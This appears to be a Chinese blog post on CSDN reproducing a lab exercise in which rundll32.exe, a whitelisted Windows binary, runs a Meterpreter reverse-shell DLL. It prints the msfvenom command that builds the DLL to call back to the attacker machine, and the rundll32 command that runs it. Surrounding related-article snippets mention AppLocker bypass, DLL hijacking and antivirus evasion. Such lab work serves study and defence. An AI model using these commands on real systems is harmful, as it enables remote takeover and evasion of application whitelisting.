对亮神基于白名单Rundll32.exe执行payload第十一季复现

最新推荐文章于 2023-10-30 17:59:36 发布
最新推荐文章于 2023-10-30 17:59:36 发布
阅读量489 收藏 1
点赞数
分类专栏: 亮神文章复现 文章标签: msf 白名单
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ws13129/article/details/89877452
版权

0x00 Rundll32简介:

Rundll32.exe是指“执行32位的DLL文件”。它的作用是执行DLL文件中的内部函数,功能就是以命令行的方式调用动态链接程序库。

0x01 环境

攻击机kali 192.168.5.102
靶机win10 192.168.1.127
靶机装有数字AV

0x02 复现

攻击机配置
在这里插入图片描述
靶机运行
在这里插入图片描述

rundll32 shell32.dll,Control_RunDLL C:\Users\Administrator\Desktop\shellcode.dll

弹回
在这里插入图片描述

0x03 dll文件生成

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.5.102 lport=4444 -f dll > shellcode.dll

0x04 总结

不过360

0x05 借鉴

https://micro8.github.io/Micro8-HTML/Chapter1/81-90/81_基于白名单Rundll32.exe执行payload第十一季.html

cxk331
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第八十一课:基于白名单Rundll32.exe执行payload第十一.docx
09-15
第八十一课:基于白名单Rundll32.exe执行payload第十一.docx
绕过AppLocker系列之Rundll32的利用
weixin_34092455的博客
09-14 196
本文讲的是绕过AppLocker系列之Rundll32的利用,Rundll32是一个可以执行DLL文件内的代码的Microsoft二进制文件。由于此实用程序是Windows操作系统的一部分,因此可以将其用作一种绕过AppLocker规则或软件限制策略的方法。所以如果系统环境没有正确的锁定某些设置,那么用户就可以使用这个二进制文件做一些事情,他们也可以编写...
关于桌面刷新 RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters 无法生效的解决办法!
ArchVillian的博客
11-16 4426
  关于使用批处理bat命令实现实时刷新桌面的功能的提问,基本上百度能搜到的回答都是使用RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters命令来实现,但是经过测试发现win7系统(其他系统未测试, 。估计一个样)能不能生效是概率事件C:\用户\用户名\ AppData的\漫游\微软\的Windows \主题\ TranscodedWallpa...
使用cmd命令修改系统壁纸
qq_39691077的博客
12-28 7925
关于修改电脑壁纸百度到的基本都是修改注册表: reg add "hkcu\control panel\desktop" /v wallpaper /d "新壁纸绝对路径" /f 然后通过 RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters 生效注册表,但这个操作好像仅适用于win7及以前的系统,对于win10/win11好像并无作用。 查阅了一些资料后了解win10的用户壁纸存在于: ‪C:\Users\用户名\AppData\Roaming\Mi
用批处理一键更换想要的壁纸.bat适用各版本Windows系统
轶软工作室
12-15 5008
用批处理一键更换想要的壁纸.bat适用各版本Windows系统 话不多说,直接上代码: @echo off reg add "hkcu\control panel\d..."%~dp0壁纸名称.jpg"中的%~dp0是表示批处理运行目录的路径,将此壁纸和批处理放同一目录运行即可,你也可以修改%~dp0为其他路径。taskkill /f /im explorer.exe 和 cmd /c start explorer 是重启Windows程序管理器,如果不喜欢用也可以删除,然后手动重启电脑也是可以生效的。
第八十一课:基于白名单Rundll32.exe执行payload第十一1
08-03
Rundll32简介:它的作用是执行DLL文件中的内部函数,功能就是以命令行的方式调用动态链接程序库。说明:Rundll32.exe所在路径已被系统添加PATH
第七十一课:基于白名单Msbuild.exe执行payload第一.docx
09-15
基于白名单Msbuild.exe执行payload的知识点解析 本资源摘要信息将基于给定的文件信息,详细解析基于白名单Msbuild.exe执行payload的知识点。 MSBuild概述 MSBuild是Microsoft Build Engine的缩写,代表Microsoft...
第七十七课:基于白名单Csc.exe执行payload第七.docx
09-15
第七十七课:基于白名单Csc.exe执行payload第七.docx
第七十二课:基于白名单Installutil.exe执行payload第二1
08-03
基于白名单installutil.exe配置payload:配置攻击机msf:靶机执行:靶机编译:靶机执行:附录:Micropoor.cs注:x64 paylo
详细讲解,命令行下的“蒙面歌王”rundll32.exe
最新发布
m0_61101264的博客
10-30 208
全部工程文件我已经传到了https://haiyangtop.cn/dll3.rar。我们在命令行下运行rundll32 dll3.dll ,F2 888,那么就会弹出标题为888的对话框。全部工程文件我已经传到了https://haiyangtop.cn/dll3.rar。我们在命令行下运行rundll32 dll3.dll ,F2 888,那么就会弹出标题为888的对话框。动画里这条命令烂大街了,已经绕不过我本机的火绒了。这是经过反汇编分析url.dll得出的结果,请记住这3条命令,活学活用,这是干货。
win10系统bat脚本自启动程序、修改壁纸、更换主题区分主副屏壁纸
热门推荐
闭海通天的博客
01-12 1万+
用.bat批处理打开多个程序、区分主副屏幕切换壁纸
刷新,注册表和exploer的方法
xurening的博客
10-13 553
gpupdate /force /wait:0 RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters 刷新注册表 taskkill /im explorer.exe /f start explorer 刷新explorer
CobaltStrike(钓鱼攻击工具)
F2444790591的博客
02-10 3960
一、介绍 (1)Cobalt Strike是一款渗透测试软件,分为客户端与服务端,可以进行团队分布式操作,服务端:1个,客户端:N个。 (2)Cobalt Strike集成了功能和模块:端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成。 二、使用(Cobaltstrike4.0) 1、Cobaltstrike 服务端的启动。 (1)开启Cobalt............
Rundll32.exe参数传递问题解决方法
冷却
10-12 2617
#include extern "C" __declspec(dllexport) void F1(int num){ CString str; str.Format("%d",num); AfxMessageBox(str);} 本人曾经碰到一个问题,就是按照网上搜索到的说明,Rundll32的用法为:rundll32 DllName,FunctionNa
c++ 调用c++dll_C格式shellcode异或加密生成dll 可过免杀过 Windows Defender
weixin_34093753的博客
01-26 754
C格式shellcode异或加密生成dll 可过免杀过 Windows Defender1简介项目地址:https://github.com/k-fire/shellcode-To-DLL测试环境: winserver2016 cs 4.0编译环境: win10 VS20192原理C格式shellcode异或加密写入dll文件当dll被调用或者被注入进其他进程时触发功能dll功能:解...
Metasploit对Rundll32
qq_41409656的博客
01-24 293
参考利用文章链接:http://www.freebuf.com/articles/terminal/135391.html     http://www.4hou.com/technology/5737.html Rundll32的利用是通过对注册动手脚,建立一个会话链接W7以上都存在,但是现在杀毒软件都监控,实验的时候关闭目标机的 杀毒软件(如:360) 通过虚拟机打物理机,下图可以
DLL劫持漏洞与思考
jklbnm12的博客
09-09 510
DLL劫持顾名思义,是去执行一个外部库(dll)的代码,而不是执行一个可移植的可执行 PE文件。通过DLL的搜索顺序,可以将代码植入二进制程序让易受攻击的应用程序加载并执行。这不是一个新提出的攻击方法,但有什么更好的方法可以通过NSA最新发布的工具Ghidra找到dll劫持代码吗? 我在这篇文章中将会相当深入地介绍DLL劫持,但首先有一些基本的概念需要了解一下。 使用Procmon,打开目标PE,识别试图从可写路径加载的DLLs文件名。 使用Ghidra识别所述DLL的入口点。 创建入口点是你的有效载荷的
DLL劫持漏洞原理
VinK1的博客
07-27 3599
DLL劫持最近一段时间实在是忙,乱七八糟的,都没空写博客,但是学习还得继续,最近看了下DLL劫持,严格上说这不能算是漏洞,但是第一次接触感觉有点意思,写出来记录一下吧,老年人了记性不好,小白文章欢迎指正。0x01 劫持原理1.什么是DLL DLL(Dynamic Link Library)文件为动态链接库文件,又称“应用程序拓展”,是软件文件类型。在Windows中,许多应用程序并不是一个
javax.validation.Payload
05-25
javax.validation.Payload 是 Java Bean Validation API 中的一个注解,它定义了一个负载(payload),用于在验证错误时传递额外的信息。该注解的作用是为了提供更加详细的错误信息,以便于开发人员更好地了解验证...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值